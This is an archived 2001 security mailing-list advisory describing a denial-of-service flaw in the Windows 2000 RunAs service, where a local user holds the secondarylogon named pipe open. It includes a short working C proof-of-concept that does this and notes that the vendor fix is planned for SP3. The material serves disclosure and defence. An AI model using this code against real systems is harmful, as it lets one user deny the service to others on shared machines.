[NT] Denial of Service Vulnerability in Windows 2000 RunAs Service

From: support@securiteam.com
Date: 11/15/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [NT] Denial of Service Vulnerability in Windows 2000 RunAs Service
Message-Id: <20011115172752.3AB63138BF@mail.der-keiler.de>
Date: Thu, 15 Nov 2001 18:27:52 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Denial of Service Vulnerability in Windows 2000 RunAs Service
------------------------------------------------------------------------

SUMMARY

The Windows 2000 RunAs service allows a user to launch an application in a
security context based upon a supplied set of credentials. A new
discovered attack effectively disables the functionality of the RunAs
services by any local user.

DETAILS

Architecturally, all communication with the RunAs service is done by means
of the named pipe "\\.\pipe\secondarylogon". Additionally, the Windows
2000 API CreateProcessWithLogonW leverages this communications channel in
an effort to launch a process with a supplied set of credentials.

The RunAs service was implemented to provide service exclusively to one
client per request. If more than one client requests service, from the
RunAs service, simultaneously, the clients will receive the error "231:
All pipe instances are busy".

Consequently, it is possible for one client to simply connect to the pipe
and never request any service. The RunAs service will wait for the client
to either disconnect or send data and will not process any other requests
until that happens.

It is possible for the attack to occur remotely, however, because of the
DACL associated with the pipe, the only users capable of this would be
members of the Administrators group.

Because of the aforementioned information, the most applicable context in
which this vulnerability could be leveraged would be that of Windows 2000
Terminal services.

// radix1112200103.c - Camisade - Team RADIX - 11-12-2001
//
// Camisade (www.camisade.com) is not responsible for the use or
// misuse of this proof of concept source code.

#define WIN32_LEAN_AND_MEAN
#define UNICODE
#define _UNICODE

#include <windows.h>
#include <tchar.h>

#include <stdio.h>
#include <conio.h>

#define SECLOGON_PIPE _T("\\\\.\\pipe\\secondarylogon")

void main()
{
   HANDLE hPipe;

   hPipe = CreateFile(SECLOGON_PIPE, GENERIC_READ|GENERIC_WRITE, 0, 0,
OPEN_EXISTING, 0, 0);
   if (hPipe == INVALID_HANDLE_VALUE)
   {
      printf("Unable to open pipe, error %d\n", GetLastError());
      return;
   }

   printf("Connected to pipe. Press any key to disconnect.\n");
   getche();

   CloseHandle(hPipe);
}

 Vendor information:
Microsoft has decided to include the fix within service pack 3 (SP3).

According to the vendor, "In February 2002, we will release Windows 2000
Service Pack 3 (SP3)".
 
<http://www.microsoft.com/presspass/features/2001/oct01/10-03securityqa.asp> http://www.microsoft.com/presspass/features/2001/oct01/10-03securityqa.asp

ADDITIONAL INFORMATION

The information has been provided by <mailto:research@camisade.com> Team
RADIX -- Camisade LLC.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • SecurityFocus Microsoft Newsletter #61
    ... Cisco 12000 Series Internet Router Denial Of Service Vulnerability ... Microsoft Windows 2000 RunAs Service Named Pipe Hijacking... ... Reach the LARGEST audience of security professionals with SecurityFocus ...
    (Focus-Microsoft)
  • [EXPL] RunAs Service Pipe Authentication Failure (exploit code)
    ... RunAs Service Pipe Authentication Failure ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... ability to recover the RunAs service user's plaintext credentials. ... that API must send highly sensitive data to the RunAs ...
    (Securiteam)
  • [NT] Cumulative Security Update for Internet Explorer (MS04-025)
    ... Get your security news from a reliable source. ... * Microsoft Windows NT Workstation 4.0 Service Pack 6a ... Navigation Method Cross-Domain Vulnerability ...
    (Securiteam)
  • [NT] Vulnerability in HTML Help Allows Code Execution (MS05-001)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Get your security news from a reliable source. ... * Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service ...
    (Securiteam)
  • Re: The Myth of the secure Mac
    ... OEM Windows XP Home goes for a bit under $100. ... >> secure than Home. ... Though this really has nothing to do with security. ... Microsoft counts on third-party developers to provide more ...
    (comp.sys.mac.advocacy)